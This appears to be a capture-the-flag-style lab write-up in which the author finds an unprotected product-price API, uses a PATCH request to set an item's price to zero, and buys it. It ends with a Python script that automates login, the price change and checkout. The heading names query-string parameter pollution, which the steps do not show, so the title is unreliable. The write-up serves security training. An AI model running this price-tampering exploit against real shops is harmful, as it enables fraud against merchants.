# 2. Exploiting server-side parameter pollution in a query string

Accessing the webpage:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FfjufYA6s1jiD3pD6Cpuc%2FPasted%20image%2020240621142221.png?alt=media&#x26;token=179757b1-a2a7-41a7-9999-e33451807907" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FKn4GjQctHkSYTcGOJSps%2FPasted%20image%2020240621142225.png?alt=media&#x26;token=494afc58-9ed9-4a64-a566-8b9808f2447d" alt=""><figcaption></figcaption></figure>

We have to buy this:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FetuV8j8QQBJQRMjHznTT%2FPasted%20image%2020240621142236.png?alt=media&#x26;token=45c9279a-3fe4-4d72-8991-135b8aafbd3a" alt=""><figcaption></figcaption></figure>

But we have to login first:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FGzphleHfU7fMMCU8Rrc0%2FPasted%20image%2020240621142256.png?alt=media&#x26;token=bf7c70fb-9b46-4eab-8958-a6ecc1364893" alt=""><figcaption></figcaption></figure>

We got the api in burpsuite:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Frvhl0ySqR523z0tZCZL3%2FPasted%20image%2020240621142320.png?alt=media&#x26;token=bb6b1913-cbec-4c14-b73f-98b3ae32ebe9" alt=""><figcaption></figcaption></figure>

It prints the price of the product as we set it to one here:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FQi7dOVOcATGZKXBb5K49%2FPasted%20image%2020240621142404.png?alt=media&#x26;token=e3ea8cdf-1966-4ee9-8760-c5be0e501975" alt=""><figcaption></figcaption></figure>

We can also find it using the JavaScript file:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FqcE2Tq6go4jH7RkC31yg%2FPasted%20image%2020240621142647.png?alt=media&#x26;token=5e1ce0e8-39bb-4195-84f9-2db13009636e" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FR40I2q45Jya1LluEcePE%2FPasted%20image%2020240621142719.png?alt=media&#x26;token=7d2cfa09-b66d-470d-963c-2debe560cd49" alt=""><figcaption></figcaption></figure>

We do not have enough money to purchase it, we have to find out another way:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fga3juD7DNvyYIfbuXYCz%2FPasted%20image%2020240621143244.png?alt=media&#x26;token=09b0d4d3-bb77-4b63-afff-43362102d30f" alt=""><figcaption></figcaption></figure>

Using OPTIONS to get the allowed methods:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2Fmy0LYzlvCJjmDqVTlXjE%2FPasted%20image%2020240621142459.png?alt=media&#x26;token=e49ec4a4-543a-43f9-9544-84f7fe2fc80a" alt=""><figcaption></figcaption></figure>

Lets try PATCH:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FIaNHxQIZResv8PrgTq7H%2FPasted%20image%2020240621142544.png?alt=media&#x26;token=bbb93a9e-8623-4e73-8568-90dad4cdf90a" alt=""><figcaption></figcaption></figure>

So we have to login in:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FYWp56Cdt5y9pUkNrjprh%2FPasted%20image%2020240621142610.png?alt=media&#x26;token=cfe3f4d9-26d5-4aa9-88eb-9e4eb5db5834" alt=""><figcaption></figcaption></figure>

After logging in and setting the session:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2F7NVANXthzTbKTAdDXA8T%2FPasted%20image%2020240621142918.png?alt=media&#x26;token=b44009ed-f45c-4e08-a596-788a6af9549b" alt=""><figcaption></figcaption></figure>

But it says that we have to use json in the content-type header, lets do it, and set an empty curly braces as data:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FEhHyOEkRCNZJvdbpnLIL%2FPasted%20image%2020240621143046.png?alt=media&#x26;token=80694da2-cee6-43c2-b143-cf26282c0f7a" alt=""><figcaption></figcaption></figure>

Here we go, it says that we have to set a parameter called price as input in json formats, lets put it and set it to 0, because we want to buy the Leet jacket we have to put its price to zero so we can buy it for example, with PATCH method to change the price:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FKCuK2a5iln2xh5ae5SqS%2FPasted%20image%2020240621143312.png?alt=media&#x26;token=95a2b969-e551-4b83-b419-4325b573d82e" alt=""><figcaption></figcaption></figure>

Lets see if it changed in the website:

Here we go:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FfrDGQA8XN6JPXhv9hrOJ%2FPasted%20image%2020240621143354.png?alt=media&#x26;token=5fb1612a-94b2-439c-8e11-4efe0ac17528" alt=""><figcaption></figcaption></figure>

Now we can buy it:

<figure><img src="https://1100854798-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F94YmDHMJbD21F4uOcvHm%2Fuploads%2FIlImDD2jUCGbAmgkxk5h%2FPasted%20image%2020240621143418.png?alt=media&#x26;token=c0e18b41-6275-4b1f-9a66-5fcaf8c41601" alt=""><figcaption></figcaption></figure>

Solve it using a `python3` script:

```python
import requests  
import re  
import os  
import sys  
  
proxies = {  
    "http": "http://127.0.0.1:8080",  
    "https": "http://127.0.0.1:8080"  
}  
  
  
session = requests.session()  
  
headers = {  
    "Content-Type": "application/json"  
}  
  
price_data = {  
    "price": 0  
}  
  
  
def Login(username, password):  
    print("[*] Get CSRF Token.")  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "login", proxies=proxies, verify=False).text)  
    print("[*] Logging In.")  
    data = f"csrf={csrf[0]}&username={username}&password={password}"  
    session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)  
  
  
def PatchPrice():  
    print("[*] Patch The Price To 0.")  
    session.patch(url=url + "api/products/1/price", headers=headers, json=price_data, proxies=proxies, verify=False)  
  
  
def BuyProduct():  
    hearders = {  
        "Content-Type": "application/x-www-form-urlencoded",  
    }  
    Product_data = "productId=1&redir=PRODUCT&quantity=1"  
    print("[*] Adding The Product To Cart.")  
    session.post(url=url + "cart",  headers=hearders, data=Product_data, allow_redirects=True, proxies=proxies, verify=False)  
    csrf = re.findall(r'name="csrf" value="(.+?)"', session.get(url=url + "cart", proxies=proxies, verify=False).text)  
    print("[*] Purchase The Product.")  
    Checkout_data = f"csrf={csrf[0]}"  
    session.post(url=url + "cart/checkout", data=Checkout_data, proxies=proxies, verify=False)  
  
  
if __name__ == "__main__":  
    if len(sys.argv) != 2:  
        script_name = os.path.basename(__file__)  
        print(f"[-] Usage: python {script_name} http://localhost/")  
        sys.exit(1)  
    url = sys.argv[1]  
    Login("wiener", "peter")  
    PatchPrice()  
    BuyProduct()  
    print("[+] Solved.")
```